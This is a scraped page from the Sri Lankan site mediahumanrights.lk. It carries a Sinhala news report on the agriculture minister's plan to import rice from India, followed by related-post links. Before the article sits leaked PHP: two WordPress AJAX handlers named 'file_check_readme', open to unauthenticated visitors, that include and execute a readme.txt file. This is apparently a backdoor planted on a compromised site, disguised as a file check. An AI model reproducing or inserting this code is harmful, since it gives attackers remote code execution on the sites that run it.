if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } අපට සදාකාලික උත්තර නෑ… ප‍්‍රශ්ණ එන එන විදිහට මුහුණ දෙනවා.. දැනට ඉන්දියාවෙන් හාල් ගේනවා.. - mediahumanrights.lk
mediahumanrights.lk
News Political

අපට සදාකාලික උත්තර නෑ… ප‍්‍රශ්ණ එන එන විදිහට මුහුණ දෙනවා.. දැනට ඉන්දියාවෙන් හාල් ගේනවා..

ඉන්දියාවෙන් සහල් ආනයනය කිරීම සඳහා කෘෂිකර්ම අමාත්‍යාංශය හා වෙළෙඳ අමාත්‍යාංශය ඒකාබද්ධ කැබිනට් පත්‍රිකාවක් ඉදිරිපත් කරන බව කෘෂිකර්ම අමාත්‍ය කේ.ඩී. ලාල් කාන්ත මහතා සඳහන් කරයි.

රට තුළ සහල් හිඟයක් පැවතීම හේතුවෙන් ඉන්දියාවෙන් සහල් ගෙන්වීමට කටයුතු කරන බවද හෙතෙම පැවසීය.

වී නිෂ්පාදනය අවශ්‍ය තරම් තිබුණත් ඒවා සහල් ලෙස වෙළඳපොළට නොපැමිණීම හේතුවෙන් මෙම පියවර ගත යුතුව ඇති බවද හෙතෙම කියා සිටී.

වෙළඳපළට නොපැමිණි සහල් තොග මහා පරිමාණ මෝල් හිමියන් සතුව හැර වෙනත් තැනක තිබෙන්නට නොහැකි බවද පෙන්වා දෙන ඔහු රජය කටයුතු කරන්නේ ගොවීන්ට සහ පාරිභෝගික අගතියක් නොවන පරිදි බවද කියා සිටී.

වර්තමාන ආණ්ඩුවට සදාකාලික උත්තර නැති බවත් ඒ ඒ මොහොතට අවශ්‍යතාවය අනුව වැඩ කටයුතු සිදු කරන බවත් හෙතෙම තවදුරටත් කියා සිටියේය.

අද සිය අමාත්‍යංශයේදී මාධ්‍ය අමතමින් හෙතෙම මෙම අදහස් පළ කළේය.

Related posts

ජනාධිපතිවරණය කැදවන දිනය මැතිවරණ කොමිසමෙන් ප්‍රකාශයට පත්කෙරේ..

Shiran Viraj

ආරක්‍ෂක අමාත්‍යංශයෙන් ශිෂ්‍යත්ව සමතුන්ට මුදල් ආධාර

Shiran Viraj

මෙරට නිෂ්පාදනය කරන ටින් මාළු වැඩි ප්‍රමාණයක් ප්‍රමිතියක් නැති විෂ සහිත ඒවා බව සමස්ත ලංකා ආපනශාලා හිමියන්ගේ සංගමය සඳහන් කරයි.

Shiran Viraj